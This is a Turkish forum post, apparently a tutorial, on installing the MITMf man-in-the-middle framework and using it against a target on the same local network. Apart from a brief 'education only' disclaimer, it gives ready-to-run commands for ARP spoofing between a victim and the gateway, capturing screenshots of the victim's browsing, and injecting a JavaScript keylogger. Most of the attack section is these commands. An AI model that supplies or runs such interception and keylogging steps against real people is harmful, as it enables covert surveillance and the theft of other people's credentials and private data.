Giriş 🤚
Merhaba arkadaşlar bu konumuzda elimden geldiğince mitmf(man in the middle framework) kurulumunu ve kullanımını anlatacağım yanlışım olursa lütfen düzeltiniz.
Önemli ⚠️
Bu anlatımın amacı sadece eğitim vermektir, araç kullanımından ortaya çıkabilecek olan problemler sadece kullanıcıya aittir ve tarafıma aktarılamaz, bunu okuyan herkes bunu kabul etmiş sayılmaktadır.
Kurulum 👾
Evet arkadaşlar öncelikle terminalimizi açıp,
apt-get install mitmf
yazıp indiriyoruz, eğer hata alan varsa "mitmf paketi bulunamadı", "komut yok" vs. gibi
şu komutları sırasıyla terminalimize yapıştırıyoruz :
https://github.com/byt3bl33d3r/MITMf.git
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
git clone https://github.com/byt3bl33d3r/MITMf
şimdi
cd MITMf
komutu ile MITMf klasörüne giriyoruz,
git submodule init && git submodule update --recursive
komutunu yapıştırıp enter'a basıyoruz.
evet yüklememiz tamamlandıktan sonra;
pip install -r requirements.txt
komutunu yapıştırıyoruz, eğer burdaki pip paketi ile ilgili hata alırsanız terminale
clear
yazıp,
apt install python-pip
komutu ile pip paketini kuruyoruz sonra tekrar,
pip install -r requirements.txt
komutunu yapıştırıyoruz ve kurulum bitti.
python mitmf.py --help
komutu ile neler yapabileceğimize bakabiliriz.
Kullanım ⌨️
Evet şimdi framework'umuz kuruldu her şey çok güzelde biz bunu nasıl kullanacağız dersek :
arkadaşlar öncelikle hedef ile aynı ağda olmamız gerekiyor, aynı ağda olduğunuzu varsayarak anlatıma başlıyorum
Adım 1-) cd MITMf
komutu ile klasöre giriyoruz
Adım 2-) ls
yazıp klasörü listeliyoruz
Adım 3-) python mitmf.py --arp --spoof --gateway 192.168.1.1 (modem ip adresi) --target xxx:xxx:x:xxx (hedef ip adresi)
komutu ile saldırımızı başlatıyoruz
NOT: Burada gateway'i bilmeyenler olabilir modem ip adresi olarak da bilinir.
ve an itibariyle man in the middle (ortadaki adam) olduk. E tamam olduk ne işe yaradı diyecek olursak arkadaşlar bu konumda hedefin internetteki tüm verileri sizin terminalinizden akacaktır.
ben sadece girdiği yerlerin ekran görüntüsünü alsam yada bi keylog atsam da olur diyorsanız verdiğimiz komutun sonuna:
ekran görüntüsü için şu komutu veriyoruz : --screen
yani:
python mitmf.py --arp --spoof --gateway 192.168.1.1 (modem ip adresi) --target xxx:xxx:x:xxx (hedef ip adresi) --screen
keylog atmak için ise : --jskeylogger
komutunu veriyoruz yine:
python mitmf.py --arp --spoof --gateway 192.168.1.1 (modem ip adresi) --target xxx:xxx:x:xxx (hedef ip adresi) --jskeylogger
Şeklinde kullanıyoruz.
İyi Forumlar.